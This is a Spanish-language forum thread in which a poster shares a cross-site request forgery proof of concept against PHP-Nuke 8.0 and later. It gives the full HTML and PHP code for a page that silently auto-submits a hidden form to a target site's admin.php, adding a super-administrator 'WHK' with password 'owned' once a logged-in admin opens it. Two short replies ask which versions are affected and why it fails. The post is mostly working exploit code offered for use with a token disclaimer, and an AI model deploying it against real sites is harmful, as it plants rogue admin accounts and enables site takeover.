así es, en realidad es una técnica muy facil donde haces que el administrador de un sitio visualize un formulario que se autoenvía de tal forma que crea usuarios con derechos administrativos. Hice un test para que prueven con sus propios host 

http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-Admin/

index.html

<style type="text/css">
<!--
body {
	background-image: url(fondo.gif);
}
-->
</style><center>
  <h2><u>Prueva del concepto para la creaci&oacute;n de usuarios con derechos administrativos en PHP-Nuke 8.0 o posterior</u></h2>
  <p align="left">&nbsp;</p>
  <p align="left">Recuerda que primeramente Debes iniciar seci&oacute;n en tu cuenta de administraci&oacute;n en PHP-Nuke. </p>
  </center>
<form method="GET" action="index.php">
  <p><b>Host vulnerable:</b>
    <input type="text" name="url">
    <input type="submit" value="Crear Usuario">
  </p>
</form>
 
<p>Una ves enviado este formulario podr&aacute;s ver como se ha creado un nuevo  usuario llamado &quot;WHK&quot; con el password &quot;owned&quot;, el correo enviado es falso por lo cual nadie se apoderar&aacute; de sus pruevas tanto directa como indirectamente. </p>
<p>NOTA: el uso de esta prueva es &uacute;nicamente para crear pruevas en sus propios servidores. </p>
<p>&nbsp;</p>
<p><a href="http://whk.sitehacking.net/">WHK.SiteHacking.Net</a></p>
 

index.php

<?
$URL_SF = $_GET["url"];
$URL = htmlspecialchars("$URL_SF", ENT_QUOTES);
 
 
if($URL == ''){
   echo '<META HTTP-EQUIV="refresh" content="0;URL=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-Admin/">';
}
else {
 
echo '<form method="post" action="' . $URL . '/admin.php">';
echo '<input type=hidden NAME="add_name" value="WHK">';
echo '<input type=hidden NAME="add_aid" value="WHK">';
echo '<input type=hidden NAME="add_email" value="fake@mail.noexiste">';
echo '<input type=hidden NAME="add_url" value="whk.sitehacking.net">';
echo '<input type=hidden NAME="add_admlanguage" value="italian">';
echo '<input type=hidden NAME="add_radminsuper" value="1">';
echo '<input type=hidden NAME="add_pwd" value="owned">';
echo '<input type=hidden NAME="op" value="AddAuthor">';
echo '<input type="image" height="0" width="0">';
echo '<h4>Si no eres redireccionado pulsa el siguiente boton:';
echo '<input name="submit" type="submit" value="Crear usuario">';
echo '</h4>';
echo '</FORM>';
echo '<script>document.getElementsByTagName("form")[0].submit();</script>';
 
}
?>

All versions??

Illegal Operation? porque me sale este error? no se crea, no lo permite